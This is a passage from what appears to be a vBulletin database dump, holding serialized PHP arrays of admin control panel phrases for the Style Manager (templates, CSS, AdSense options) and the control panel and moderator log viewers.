Sizes\";s:10:\"background\";s:10:\"Background\";s:25:\"bbcode_pulldown_menu_desc\";s:135:\"Here you can specify the fonts and sizes available in the pull down menus for the BB code toolbar. Separate each entry with a new-line.\";s:4:\"body\";s:4:\"Body\";s:9:\"body_desc\";s:130:\"\'Body\' is used to control the color of the outer page border, and to set the basic parameters for all text and links on all pages.\";s:6:\"border\";s:6:\"Border\";s:7:\"buttons\";s:7:\"Buttons\";s:12:\"buttons_desc\";s:140:\"\'Buttons\' is used to style form buttons such as submit and reset, along with any other <input type="button" ... /> elements.\";s:14:\"buttons_folder\";s:174:\"Button Images Folder\r\nThis is the folder containing all the button images for this style. The location of this folder can be overridden by a language setting. \";s:16:\"case_insensitive\";s:16:\"Case-Insensitive\";s:15:\"category_strips\";s:15:\"Category Strips\";s:20:\"category_strips_desc\";s:172:\"\'Category Strips\' also has a double purpose. It is used to indicate a \'Category\' (no-posting) forum, and it is also used as the style for the main title bar of most tables.\";s:29:\"change_google_adsense_package\";s:29:\"Change Google AdSense Package\";s:32:\"click_the_expand_collapse_button\";s:117:\"Click the \'Expand/Collapse\' button, or double-click the group name to expand or collapse the %1$s group of templates.\";s:19:\"closed_thread_image\";s:19:\"Closed Thread Image\";s:16:\"code_block_width\";s:251:\"Code Block Width (pixels)\r\n(This value controls the width of [code], [php] and [html] BB code blocks. You may set this value to \'auto\', but if you do, Internet Explorer will stretch the width of the block rather than inserting a scrollbar.) \";s:28:\"collapse_all_template_groups\";s:28:\"Collapse All Template Groups\";s:23:\"collapse_template_group\";s:23:\"Collapse Template Group\";s:18:\"collapse_templates\";s:18:\"Collapse Templates\";s:10:\"collapse_x\";s:13:\"Collapse %1$s\";s:22:\"color_picker_not_ready\";s:47:\"The color picker is still loading, please wait.\";s:7:\"comment\";s:7:\"Comment\";s:16:\"common_templates\";s:16:\"Common Templates\";s:16:\"compare_versions\";s:16:\"Compare Versions\";s:23:\"comparing_versions_of_x\";s:54:\"Comparing Versions of %1$s \";s:14:\"comparison_key\";s:14:\"Comparison Key\";s:35:\"confirm_removal_of_copyright_notice\";s:45:\"Confirm Removal of vBulletin Copyright Notice\";s:7:\"content\";s:7:\"Content\";s:4:\"copy\";s:4:\"Copy\";s:16:\"create_new_style\";s:16:\"Create New Style\";s:29:\"creating_a_new_style_called_x\";s:41:\"Creating a new Style called \'%1$s \'\";s:3:\"css\";s:3:\"CSS\";s:14:\"css_selector_x\";s:18:\"CSS Selector: %1$s\";s:17:\"css_value_invalid\";s:49:\"Error: %1$s is not a valid value for a CSS entry.\";s:15:\"current_default\";s:15:\"Current Default\";s:15:\"current_version\";s:15:\"Current Version\";s:16:\"custom_templates\";s:16:\"Custom Templates\";s:9:\"customize\";s:9:\"Customize\";s:17:\"customize_further\";s:17:\"Customize Further\";s:32:\"customize_replacement_variable_x\";s:64:\"Customize Replacement Variable: %1$s \";s:20:\"customize_template_x\";s:52:\"Customize Template: %1$s \";s:30:\"customized_in_a_parent_style_x\";s:94:\"Customized in a Parent Style \";s:24:\"customized_in_this_style\";s:24:\"Customized in this Style\";s:29:\"default_template_updated_desc\";s:124:\"Default Template Updated in %1$s by %2$s Your Custom Template Last Edited in %3$s by %4$s \";s:12:\"delete_style\";s:12:\"Delete Style\";s:13:\"depth_x_items\";s:16:\"Depth %1$s Items\";s:16:\"disable_wrapping\";s:16:\"Disable Wrapping\";s:21:\"edit_fonts_colors_etc\";s:24:\"Edit Fonts / Colors etc.\";s:13:\"edit_settings\";s:13:\"Edit Settings\";s:18:\"edit_style_options\";s:18:\"Edit Style Options\";s:11:\"edit_styles\";s:11:\"Edit Styles\";s:13:\"edit_template\";s:13:\"Edit Template\";s:14:\"edit_templates\";s:14:\"Edit Templates\";s:25:\"editor_styles_button_down\";s:31:\"Editor buttons in clicked state\";s:26:\"editor_styles_button_hover\";s:29:\"Editor buttons in hover state\";s:27:\"editor_styles_button_normal\";s:30:\"Editor buttons in normal state\";s:29:\"editor_styles_button_selected\";s:32:\"Editor buttons in selected state\";s:23:\"editor_styles_menu_down\";s:49:\"Editor menu items in clicked state (WYSIWYG only)\";s:24:\"editor_styles_menu_hover\";s:47:\"Editor menu items in hover state (WYSIWYG only)\";s:25:\"editor_styles_menu_normal\";s:48:\"Editor menu items in normal state (WYSIWYG only)\";s:24:\"editor_styles_popup_down\";s:53:\"Editor popup controls in clicked state (WYSIWYG only)\";s:15:\"enable_wrapping\";s:15:\"Enable Wrapping\";s:19:\"entry_has_a_comment\";s:56:\"* - Entry has a comment. Hover over the type to view it.\";s:26:\"expand_all_template_groups\";s:26:\"Expand All Template Groups\";s:21:\"expand_template_group\";s:21:\"Expand Template Group\";s:16:\"expand_templates\";s:16:\"Expand Templates\";s:8:\"expand_x\";s:11:\"Expand %1$s\";s:9:\"extra_css\";s:20:\"Extra CSS Attributes\";s:28:\"file_inclusion_not_permitted\";s:113:\"File inclusion is not permitted in template conditional expressions. Please go back and re-write this expression.\";s:29:\"find_and_replace_in_templates\";s:43:\"Find and Replace in Templates (be careful!)\";s:23:\"first_alternating_color\";s:23:\"First Alternating Color\";s:28:\"first_alternating_color_desc\";s:169:\"Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'First Alternating Color\' here.\";s:41:\"following_options_apply_only_if_new_style\";s:107:\"The following options apply only if you are creating a new style, rather than overwriting an existing style\";s:10:\"font_color\";s:10:\"Font Color\";s:11:\"font_family\";s:11:\"Font Family\";s:9:\"font_size\";s:9:\"Font Size\";s:10:\"font_style\";s:10:\"Font Style\";s:16:\"fonts_colors_etc\";s:19:\"Fonts / Colors etc.\";s:16:\"form_spacer_size\";s:118:\"Form Element Spacer Size (pixels) (This is the size of the spacer used to separate blocks of form elements) \";s:10:\"form_width\";s:114:\"Form Width (pixels) (This value specifies the width in pixels of most forms in the vBulletin interface) \";s:17:\"form_width_usercp\";s:191:\"User Control Panel Form Width (pixels) (This value allows you to specify a smaller form width, to compensate for the presence of the navigation bar in the user control panel pages) \";s:15:\"forum_jump_menu\";s:15:\"Forum Jump Menu\";s:13:\"function_name\";s:13:\"Function Name\";s:37:\"get_customizations_from_parent_styles\";s:66:\"Get customizations made in this style and all parent styles \";s:39:\"get_customizations_from_this_style_only\";s:49:\"Get customizations made only in this style \";s:16:\"global_templates\";s:16:\"Global Templates\";s:26:\"google_adsense_advertising\";s:26:\"Google AdSense Advertising\";s:27:\"google_adsense_package_high\";s:152:\"High - one medium advertisting unit under the navbar, one unit before the footer, and one unit for guests in the first post of a thread\";s:26:\"google_adsense_package_low\";s:109:\"Low - one small text-only advertising unit under the navbar and one small unit in the footer\";s:27:\"google_adsense_publisher_id\";s:27:\"Google AdSense Publisher ID\";s:17:\"group_ad_location\";s:11:\"Ad Location\";s:11:\"group_album\";s:5:\"Album\";s:21:\"group_attachment_list\";s:15:\"Attachment List\";s:20:\"group_bb_code_layout\";s:14:\"BB Code Layout\";s:16:\"group_buddy_list\";s:20:\"Buddy (Contact) List\";s:14:\"group_calendar\";s:8:\"Calendar\";s:12:\"group_editor\";s:6:\"Editor\";s:9:\"group_faq\";s:3:\"FAQ\";s:19:\"group_forum_display\";s:13:\"Forum Display\";s:16:\"group_forum_home\";s:10:\"Forum Home\";s:10:\"group_help\";s:4:\"Help\";s:24:\"group_human_verification\";s:18:\"Human Verification\";s:23:\"group_instant_messaging\";s:17:\"Instant Messaging\";s:17:\"group_member_info\";s:11:\"Member Info\";s:18:\"group_members_list\";s:13:\"Member\'s List\";s:16:\"group_moderation\";s:10:\"Moderation\";s:24:\"group_modify_user_option\";s:18:\"Modify User Option\";s:27:\"group_navigation_breadcrumb\";s:23:\"Navigation / Breadcrumb\";s:17:\"group_new_posting\";s:11:\"New Posting\";s:21:\"group_page_navigation\";s:15:\"Page Navigation\";s:24:\"group_paid_subscriptions\";s:20:\"Subscriptions (Paid)\";s:21:\"group_picture_comment\";s:15:\"Picture Comment\";s:10:\"group_poll\";s:4:\"Poll\";s:15:\"group_post_icon\";s:9:\"Post Icon\";s:13:\"group_postbit\";s:7:\"Postbit\";s:17:\"group_posthistory\";s:17:\"Post Edit History\";s:22:\"group_printable_thread\";s:16:\"Printable Thread\";s:21:\"group_private_message\";s:15:\"Private Message\";s:18:\"group_registration\";s:12:\"Registration\";s:12:\"group_search\";s:6:\"Search\";s:17:\"group_show_groups\";s:11:\"Show Groups\";s:17:\"group_show_thread\";s:11:\"Show Thread\";s:18:\"group_smilie_popup\";s:12:\"Smilie Popup\";s:18:\"group_socialgroups\";s:13:\"Social Groups\";s:23:\"group_subscribed_thread\";s:36:\"Subscriptions (Thread Notifications)\";s:27:\"group_thread_administration\";s:21:\"Thread Administration\";s:15:\"group_threadbit\";s:9:\"Threadbit\";s:24:\"group_user_control_panel\";s:18:\"User Control Panel\";s:21:\"group_user_infraction\";s:15:\"User Infraction\";s:15:\"group_user_note\";s:9:\"User Note\";s:24:\"group_user_profile_field\";s:18:\"User Profile Field\";s:21:\"group_user_reputation\";s:28:\"Reputation (User Reputation)\";s:21:\"group_visitor_message\";s:15:\"Visitor Message\";s:16:\"group_who_posted\";s:11:\"Who Posted?\";s:17:\"group_whos_online\";s:12:\"Who\'s Online\";s:16:\"highlighted_font\";s:16:\"Highlighted Font\";s:21:\"highlighted_font_desc\";s:121:\"\'Highlighted Font\' is used primarily to highlight search words in search results, but is used occasionally elsewhere too.\";s:10:\"historical\";s:10:\"Historical\";s:21:\"history_of_template_x\";s:52:\"History of Template %1$s \";s:10:\"hover_link\";s:5:\"Hover\";s:12:\"html_doctype\";s:12:\"HTML Doctype\";s:20:\"ignore_style_version\";s:113:\"Ignore Style Version Use style file even if it was created by a different version of vBulletin? \";s:11:\"image_paths\";s:11:\"Image Paths\";s:13:\"images_folder\";s:13:\"Images Folder\";s:21:\"import_style_xml_file\";s:21:\"Import Style XML File\";s:15:\"importing_style\";s:15:\"Importing Style\";s:22:\"including_master_style\";s:22:\"Including MASTER STYLE\";s:7:\"inherit\";s:7:\"Inherit\";s:20:\"inline_mod_highlight\";s:35:\"Inline Moderation Element Highlight\";s:25:\"inline_mod_highlight_desc\";s:101:\"When an inline moderation checkbox is clicked, the corresponding item will be styled with this class.\";s:18:\"inner_border_width\";s:123:\"Inner Border Width (pixels) (This value specifies the width in pixels of the inner-border of all colored tables) \";s:17:\"inner_table_width\";s:120:\"Inner Table Width (pixels or percentage) (This is the width given to every table within your vBulletin pages) \";s:12:\"input_fields\";s:12:\"Input Fields\";s:17:\"input_fields_desc\";s:74:\"\'Input Fields\' is used to style single and multi-line text boxes in forms.\";s:19:\"internet_explorer_4\";s:20:\"Internet Explorer 4+\";s:47:\"it_appears_you_are_removing_vbulletin_copyright\";s:252:\"It appears that you may be removing the vBulletin copyright notice from this template. If this is the case, please be aware that this may be a violation of the license agreement. Continue only if you are sure that you will not be violating the license.\";s:9:\"justified\";s:9:\"Justified\";s:13:\"last_modified\";s:13:\"Last Modified\";s:11:\"legend_desc\";s:122:\"Use this setting to set the style of the <legend> text that appears in the border of <frameset> tags in forms.\";s:22:\"lines_around_each_diff\";s:22:\"lines around each diff\";s:8:\"main_css\";s:8:\"Main CSS\";s:16:\"main_table_width\";s:124:\"Main Table Width (pixels or percentage) (This is the width of the table that contains all your vBulletin content) \";s:12:\"master_style\";s:12:\"MASTER STYLE\";s:5:\"menus\";s:14:\" Menus\";s:10:\"menus_desc\";s:61:\"All <select> elements will be styled with this control.\";s:13:\"message_width\";s:151:\"Message Area Width (pixels) (This value allows you to specify the width in pixels of the text box used for all message posting in vBulletin) \";s:20:\"message_width_usercp\";s:149:\"User Control Panel Message Area Width (pixels) (This value represents the width in pixels of the message area in user control panel pages) \";s:18:\"misc_images_folder\";s:116:\"Miscellaneous Images Folder\r\nThis folder contains the various images that do not fit into other category. \";s:11:\"navbar_text\";s:11:\"Navbar Text\";s:16:\"navbar_text_desc\";s:86:\"This group of settings controls the style of the navigation bread-crumb in the Navbar.\";s:10:\"netscape_4\";s:22:\"Netscape Navigator 4.x\";s:10:\"netscape_6\";s:36:\"Netscape Navigator 6.x / Mozilla 1.x\";s:8:\"new_line\";s:8:\"New Line\";s:15:\"new_reply_image\";s:15:\"New Reply Image\";s:16:\"new_thread_image\";s:16:\"New Thread Image\";s:11:\"new_version\";s:11:\"New Version\";s:21:\"no_google_adsense_ads\";s:28:\"No Google AdSense Ads \";s:15:\"no_parent_style\";s:15:\"No Parent Style\";s:23:\"no_replacements_defined\";s:51:\"No replacement variables are defined for this style\";s:25:\"no_styles_needed_updating\";s:25:\"No styles needed updating\";s:11:\"normal_link\";s:6:\"Normal\";s:9:\"not_found\";s:9:\"Not Found\";s:37:\"notes_for_using_regex_in_find_replace\";s:57:\"Notes for Using Regular Expressions with Find and Replace\";s:11:\"old_default\";s:11:\"Old Default\";s:8:\"old_line\";s:8:\"Old Line\";s:26:\"old_template_table_dropped\";s:26:\"Old Template Table Dropped\";s:11:\"old_version\";s:11:\"Old Version\";s:18:\"outer_border_width\";s:123:\"Outer Border Width (pixels) (This value specifies the width in pixels of the outer-border of all colored tables) \";s:15:\"overwrite_style\";s:190:\"Merge Into Style (Selecting a style here will cause the imported style to be merged into an existing style, overwriting any conflicting entries. Leave blank to create a new style) \";s:19:\"overwriting_style_x\";s:31:\"Overwriting Style \'%1$s \'\";s:7:\"padding\";s:7:\"Padding\";s:15:\"page_background\";s:15:\"Page Background\";s:20:\"page_background_desc\";s:97:\"\'Page Background\' is used primarily to set the background and text colors of the inner-page area.\";s:5:\"panel\";s:13:\"Panel (Forms)\";s:10:\"panel_desc\";s:76:\"\'Panel\' is used to create a panel in which most form elements are displayed.\";s:14:\"panel_surround\";s:14:\"Panel Surround\";s:19:\"panel_surround_desc\";s:85:\"This style is used for the thick border that surrounds the panel used for most forms.\";s:49:\"please_be_aware_replacement_variable_is_inherited\";s:162:\"Please be aware that if this replacement variable is inherited by child styles, they too will lose any customizations you have made for this replacement variable.\";s:37:\"please_be_aware_template_is_inherited\";s:138:\"Please be aware that if this template is inherited by child styles, they too will lose any customizations you have made for this template.\";s:49:\"please_be_aware_this_will_delete_custom_templates\";s:167:\"Please be aware that this will also delete all custom templates belonging to this style. Any child styles will attach themselves to this set\'s parent style.\";s:18:\"poll_images_folder\";s:125:\"Poll Images Folder\r\nThis folder contains the various images used to build the colored bars in poll voting results. \";s:15:\"popup_menu_body\";s:15:\"Popup Menu Body\";s:20:\"popup_menu_body_desc\";s:64:\"This style is applied to the outer body of \'vbmenu\' popup menus.\";s:18:\"popup_menu_control\";s:19:\"Popup Menu Controls\";s:23:\"popup_menu_control_desc\";s:186:\"This style is applied to elements which, when clicked, will open a popup menu. For visual consistency, it is occasionally used simply to emphasize an element containing a clickable link.\";s:17:\"popup_menu_hilite\";s:29:\"Popup Menu Highlighted Option\";s:22:\"popup_menu_hilite_desc\";s:110:\"When a menu option is highlighted due to the mouse moving over it, it will temporarily be assigned this style.\";s:17:\"popup_menu_option\";s:21:\"Popup Menu Option Row\";s:22:\"popup_menu_option_desc\";s:63:\"This style is applied to each row inside a \'vbmenu\' popup menu.\";s:9:\"post_icon\";s:9:\"Post Icon\";s:7:\"preview\";s:7:\"Preview\";s:20:\"rating_images_folder\";s:134:\"Ratings Images Folder\r\nThis folder contains the images used to illustrate the rating applied to an item (usually a thread). \";s:18:\"rebuild_all_styles\";s:18:\"Rebuild All Styles\";s:10:\"regex_help\";s:428:\"The regular expression option is for advanced users only ! Setting this option to \'yes\' will use preg_replace() instead of str_replace() for your find/replace operation. Do not use this option if you are not sure how to use PCRE regular expressions!\";s:23:\"regular_expression_used\";s:23:\"Regular Expression Used\";s:20:\"replacement_variable\";s:20:\"Replacement Variable\";s:48:\"replacement_variable_is_customized_in_this_style\";s:48:\"Replacement Variable is Customized in this Style\";s:53:\"replacement_variable_is_inherited_from_a_parent_style\";s:53:\"Replacement Variable is Inherited From a Parent Style\";s:56:\"replacement_variable_is_unchanged_from_the_default_style\";s:56:\"Replacement Variable is Unchanged From the Default Style\";s:28:\"replacement_variable_manager\";s:28:\"Replacement Variable Manager\";s:21:\"replacement_variables\";s:21:\"Replacement Variables\";s:24:\"reputation_images_folder\";s:119:\"Reputation Images Folder\r\nThis folder contains the small images used to display a user\'s current reputation. \";s:20:\"revert_all_templates\";s:20:\"Revert all Templates\";s:33:\"revert_all_templates_from_style_x\";s:365:\"Are you sure you want to revert all templates from the style called \'%1$s\'? \r\n \r\nThis will cause all templates in this style to revert to their default or inherited status. Custom templates that do not exist in this style\'s parent will not be affected. \r\n \r\nThe following templates will be reverted:\r\n\r\nThis action cannot be undone.\";s:29:\"revert_this_group_of_settings\";s:94:\"To revert this group of settings to their inherited value, check this box and submit the form.\";s:15:\"save_and_reload\";s:15:\"Save and Reload\";s:8:\"save_css\";s:8:\"Save CSS\";s:24:\"save_in_template_history\";s:25:\"Save in Template History?\";s:20:\"search_in_all_styles\";s:20:\"Search in all Styles\";s:15:\"search_in_style\";s:15:\"Search in Style\";s:18:\"search_in_template\";s:18:\"Search in Template\";s:19:\"search_in_templates\";s:19:\"Search in Templates\";s:16:\"search_templates\";s:16:\"Search Templates\";s:24:\"second_alternating_color\";s:24:\"Second Alternating Color\";s:29:\"second_alternating_color_desc\";s:171:\"Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'Second Alternating Color\' here. \";s:13:\"selected_item\";s:13:\"Selected Item\";s:8:\"settings\";s:8:\"Settings\";s:12:\"show_default\";s:12:\"Show Default\";s:20:\"sizes_and_dimensions\";s:20:\"Sizes and Dimensions\";s:10:\"small_font\";s:10:\"Small Font\";s:15:\"small_font_desc\";s:84:\"On occasions where smaller-than-normal text is required, this style will be applied.\";s:11:\"spacer_size\";s:86:\"Spacer Size (pixels) (Spacing between the body border and the main content) \";s:12:\"standard_css\";s:23:\"Standard CSS Attributes\";s:17:\"statusicon_folder\";s:196:\"Item Status Icon Folder\r\nThis folder contains all the icons representing the status of forums, threads, posts etc. \r\nFor example: announcement_old.gif / announcement_new.gif \";s:40:\"strongly_recommend_testing_regex_replace\";s:108:\"It is strongly recommended that you use the \'test\' option before actually performing a regex replace.\";s:13:\"style_manager\";s:13:\"Style Manager\";s:12:\"table_border\";s:12:\"Table Border\";s:17:\"table_border_desc\";s:250:\"\'Table Border\' serves two purposes - primarily it is used to set the background color of all colored tables, which will show through in the color of the lines between cells. Secondly, you may wish to apply a border to the outside of the table itself.\";s:18:\"table_cell_padding\";s:113:\"Table Cell Padding (pixels) (This value allows you to set the cellpadding for all tables in vBulletin) \";s:12:\"table_footer\";s:12:\"Table Footer\";s:17:\"table_footer_desc\";s:115:\"Some tables have an additional bar at their base to hold extra controls etc. \'Table Footer\' is used to style these.\";s:12:\"table_header\";s:12:\"Table Header\";s:17:\"table_header_desc\";s:175:\"\'Table Header\' is most often used as the style for a column heading in a table, but is also occasionally used for the main title bar of a small table, such as \'Posting Rules\'.\";s:8:\"template\";s:8:\"Template\";s:37:\"template_condition_contains_functions\";s:69:\"The following template conditional expression contains function calls\";s:26:\"template_edited_after_load\";s:102:\"Template was edited after the page was loaded by %1$s, the previous template was saved in the history.\";s:19:\"template_eval_error\";s:261:\"The following error occurred when attempting to evaluate this template:%1$s This is likely caused by a malformed conditional statement. It is highly recommended that you fix this error before continuing, but you may continue as-is if you wish.\";s:36:\"template_is_customized_in_this_style\";s:36:\"Template is Customized in this Style\";s:41:\"template_is_inherited_from_a_parent_style\";s:41:\"Template is Inherited From a Parent Style\";s:44:\"template_is_unchanged_from_the_default_style\";s:44:\"Template is Unchanged From the Default Style\";s:23:\"template_last_edited_js\";s:47:\"Last edited %1$s %2$s %3$s at %4$s:%5$s by %6$s\";s:16:\"template_options\";s:16:\"Template Options\";s:23:\"template_x_exists_error\";s:124:\"A template named %1$s already exists. \r\n \r\nIf you click \'Save\' the existing template will be overwritten.\";s:32:\"temporary_template_table_created\";s:32:\"Temporary Template Table Created\";s:51:\"temporary_template_table_populated_with_x_templates\";s:54:\"Temporary Template Table Populated with %1$s Templates\";s:32:\"temporary_template_table_renamed\";s:32:\"Temporary Template Table Renamed\";s:17:\"test_replace_only\";s:133:\"Test Replacement Only (This will show you the results of doing this find/replace, without actually updating the templates) \";s:25:\"text_added_in_new_version\";s:25:\"Text added in new version\";s:13:\"text_ads_only\";s:13:\"Text ads only\";s:18:\"text_and_image_ads\";s:18:\"Text and image ads\";s:29:\"text_changed_between_versions\";s:29:\"Text changed between versions\";s:15:\"text_decoration\";s:15:\"Text Decoration\";s:9:\"text_desc\";s:163:\"Use this control to set the text attributes for all text elements on the page that may ignore the \'Body\' attributes, in particular text inside <td> tags etc.\";s:24:\"text_editor_control_desc\";s:105:\"These settings allow you to control how controls on the WYSIWYG and standard text editor toolbars appear.\";s:27:\"text_editor_controls_folder\";s:151:\"Text Editor Controls Folder\r\nThis folder contains the button and interface images for the vBulletin text editor (used to post/edit messages) \";s:19:\"text_in_new_version\";s:19:\"Text in New Version\";s:19:\"text_in_old_version\";s:19:\"Text in Old Version\";s:29:\"text_removed_from_old_version\";s:29:\"Text removed from old version\";s:24:\"text_surrounding_changes\";s:24:\"Text Surrounding Changes\";s:16:\"textarea_columns\";s:16:\"Textarea Columns\";s:52:\"this_item_is_customized_in_the_parent_style_called_x\";s:61:\"This item is customized in the parent style called\\n\\n\'%1$s\'.\";s:51:\"this_template_has_been_customized_in_a_parent_style\";s:350:\"This template has been customized within the %1$s style, (a parent set of the %2$s style). You may click the \'Customize\' button to create a customized version of this template, based on the customizations in the %1$s style. If you would like to edit the %3$s template within the %1$s parent style, Click Here .\";s:47:\"this_template_has_been_customized_in_this_style\";s:281:\"This template has been customized in the current style. Double-click the template name or click the \'Edit\' button to modify the template. You may also view the original template, from which this template was customized, by clicking the \'View Original\' button.\";s:37:\"this_template_has_not_been_customized\";s:240:\"This template has not been customized in this style or any of its parent styles. Double-click the template name or click the \'Customize\' button to add a customized version of this template to the current style and its child sets.\";s:10:\"time_color\";s:10:\"Time Color\";s:15:\"time_color_desc\";s:76:\"\'Time Color\' is applied to (most) instances of a time stamp being displayed.\";s:24:\"title_for_uploaded_style\";s:100:\"Title for Uploaded Style (Leave blank to use the style title specified in the style file) \";s:11:\"title_image\";s:113:\"Title Image\r\nThis is the image located in the \'header\' template, used as the main logo for your forum. \";s:20:\"toolbar_menu_options\";s:20:\"Toolbar Menu Options\";s:4:\"type\";s:4:\"Type\";s:19:\"type_of_ads_to_show\";s:19:\"Type of Ads to Show\";s:7:\"unknown\";s:7:\"Unknown\";s:24:\"unsaved_data_may_be_lost\";s:53:\"There is unsaved data on the page and it may be lost.\";s:25:\"updated_default_templates\";s:25:\"Updated Default Templates\";s:30:\"updated_default_templates_desc\";s:411:\"The templates shown on this page have been updated in the default template set since you customized them. \r\n \r\nIt may be necessary for you to revert the custom templates, or otherwise check that they fully support vBulletin %1$s. If you do not do this, some sections of vBulletin may not function! Please see the release announcements at the vBulletin.com Forums for more information.\";s:41:\"updating_style_information_for_each_style\";s:44:\"Updating style information for each style...\";s:32:\"updating_style_information_for_x\";s:57:\"Updating Style Information for \'%1$s\' and child styles...\";s:31:\"updating_styles_with_no_parents\";s:46:\"Updating style sets with no parent information\";s:21:\"updating_template_ids\";s:21:\"Updating Template IDs\";s:19:\"usage_in_expression\";s:19:\"Usage in Expression\";s:23:\"use_regular_expressions\";s:52:\"Use Regular Expressions (see notes below) \";s:7:\"version\";s:7:\"Version\";s:12:\"view_history\";s:12:\"View History\";s:11:\"view_inline\";s:11:\"View Inline\";s:13:\"view_original\";s:13:\"View Original\";s:13:\"view_quickref\";s:13:\"View QuickRef\";s:17:\"view_side_by_side\";s:17:\"View Side by Side\";s:32:\"view_your_forum_using_this_style\";s:32:\"View Your Forum Using this Style\";s:20:\"viewing_version_of_x\";s:51:\"Viewing Version of %1$s \";s:12:\"visited_link\";s:7:\"Visited\";s:54:\"with_a_few_exceptions_function_calls_are_not_permitted\";s:221:\"With a few exceptions, function calls are not permitted in template conditional expressions. Please go back and re-write this expression. The following functions are allowed in template conditional expressions:\";s:9:\"wrap_text\";s:9:\"Wrap Text\";s:20:\"wysiwyg_editor_style\";s:63:\"WYSIWYG Editor (Should usually be the same as \'%1$s\' or \'%2$s\')\";s:25:\"wysiwyg_editor_style_desc\";s:212:\"This style will be applied to the WYSIWYG editor message area. For a true what-you-see-is-what-you-get experience, this should share its settings with First Alternating Color\' but you can set whatever you choose.\";s:11:\"x_links_css\";s:14:\"%1$s Links CSS\";s:11:\"x_templates\";s:14:\"%1$s Templates\";}', 'a:66:{s:33:\"admin_control_panel_failed_logins\";s:33:\"Admin Control Panel Failed Logins\";s:20:\"album_x_by_y_deleted\";s:28:\"Album \'%1$s\' by %2$s Deleted\";s:19:\"album_x_by_y_edited\";s:27:\"Album \'%1$s\' by %2$s Edited\";s:15:\"all_log_entries\";s:15:\"All Log Entries\";s:19:\"all_scheduled_tasks\";s:19:\"All Scheduled Tasks\";s:11:\"all_scripts\";s:11:\"All Scripts\";s:67:\"are_you_sure_you_want_to_prune_x_log_entries_from_control_panel_log\";s:75:\"Are you sure you want to prune %1$s log entries from the control panel log?\";s:63:\"are_you_sure_you_want_to_prune_x_log_entries_from_moderator_log\";s:71:\"Are you sure you want to prune %1$s log entries from the moderator log?\";s:68:\"are_you_sure_you_want_to_prune_x_log_entries_from_scheduled_task_log\";s:76:\"Are you sure you want to prune %1$s log entries from the scheduled task log?\";s:47:\"control_panel_log_pruning_permission_restricted\";s:48:\"Control Panel log pruning permission restricted.\";s:24:\"control_panel_log_viewer\";s:24:\"Control Panel Log Viewer\";s:63:\"control_panel_log_viewer_page_x_y_there_are_z_total_log_entries\";s:77:\"Control Panel Log Viewer (page %1$s/%2$s) | There are %3$s total log entries.\";s:36:\"control_panel_log_viewing_restricted\";s:37:\"Control Panel log viewing restricted.\";s:30:\"discussion_by_x_for_y_approved\";s:36:\"Discussion by %1$s for %2$s Approved\";s:29:\"discussion_by_x_for_y_removed\";s:41:\"Group Discussion by %1$s for %2$s Removed\";s:34:\"discussion_by_x_for_y_soft_deleted\";s:46:\"Group Discussion by %1$s for %2$s Soft Deleted\";s:32:\"discussion_by_x_for_y_unapproved\";s:38:\"Discussion by %1$s for %2$s unapproved\";s:27:\"gm_by_x_in_y_for_z_approved\";s:51:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Approved\";s:25:\"gm_by_x_in_y_for_z_edited\";s:49:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Edited\";s:26:\"gm_by_x_in_y_for_z_removed\";s:50:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Removed\";s:31:\"gm_by_x_in_y_for_z_soft_deleted\";s:55:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Soft Deleted\";s:29:\"gm_by_x_in_y_for_z_unapproved\";s:53:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Unapproved\";s:28:\"gm_by_x_in_y_for_z_undeleted\";s:52:\"Group Message by %1$s in \'%2$s\' for \'%3$s\' Undeleted\";s:2:\"id\";s:2:\"ID\";s:11:\"log_entries\";s:11:\"Log Entries\";s:28:\"log_entries_to_show_per_page\";s:28:\"Log Entries to Show Per Page\";s:28:\"log_file_deletion_restricted\";s:29:\"Log file deletion restricted.\";s:20:\"moderator_log_viewer\";s:20:\"Moderator Log Viewer\";s:59:\"moderator_log_viewer_page_x_y_there_are_z_total_log_entries\";s:73:\"Moderator Log Viewer (page %1$s/%2$s) | There are %3$s total log entries.\";s:15:\"order_by_action\";s:15:\"Order By Action\";s:15:\"order_by_script\";s:15:\"Order By Script\";s:21:\"pc_by_x_on_y_approved\";s:50:\"Picture Comment by %1$s on Picture \'%2$s\' Approved\";s:19:\"pc_by_x_on_y_edited\";s:48:\"Picture Comment by %1$s on Picture \'%2$s\' Edited\";s:20:\"pc_by_x_on_y_removed\";s:49:\"Picture Comment by %1$s on Picture \'%2$s\' Removed\";s:25:\"pc_by_x_on_y_soft_deleted\";s:54:\"Picture Comment by %1$s on Picture \'%2$s\' Soft Deleted\";s:23:\"pc_by_x_on_y_unapproved\";s:52:\"Picture Comment by %1$s on Picture \'%2$s\' Unapproved\";s:22:\"pc_by_x_on_y_undeleted\";s:51:\"Picture Comment by %1$s on Picture \'%2$s\' Undeleted\";s:28:\"picture_x_in_y_by_z_approved\";s:47:\"Picture \'%1$s\' in Album \'%2$s\' by %3$s Approved\";s:27:\"picture_x_in_y_by_z_deleted\";s:46:\"Picture \'%1$s\' in Album \'%2$s\' by %3$s Deleted\";s:26:\"picture_x_in_y_by_z_edited\";s:45:\"Picture \'%1$s\' in Album \'%2$s\' by %3$s Edited\";s:23:\"prune_control_panel_log\";s:23:\"Prune Control Panel Log\";s:17:\"prune_log_entries\";s:17:\"Prune Log Entries\";s:19:\"prune_moderator_log\";s:19:\"Prune Moderator Log\";s:24:\"prune_scheduled_task_log\";s:24:\"Prune Scheduled Task Log\";s:29:\"remove_entries_logged_by_user\";s:29:\"Remove Entries Logged by User\";s:30:\"remove_entries_older_than_days\";s:32:\"Remove Entries Older Than (Days)\";s:32:\"remove_entries_related_to_action\";s:33:\"Remove Entries Relating to Action\";s:33:\"remove_entries_relating_to_script\";s:33:\"Remove Entries Relating to Script\";s:25:\"scheduled_task_log_viewer\";s:25:\"Scheduled Task Log Viewer\";s:64:\"scheduled_task_log_viewer_page_x_y_there_are_z_total_log_entries\";s:78:\"Scheduled Task Log Viewer (page %1$s/%2$s) | There are %3$s total log entries.\";s:30:\"show_only_entries_generated_by\";s:30:\"Show Only Entries Generated By\";s:36:\"show_only_entries_relating_to_script\";s:36:\"Show Only Entries Relating to Script\";s:35:\"social_group_picture_x_in_y_removed\";s:45:\"Social Group Picture \'%1$s\' in \'%2$s\' 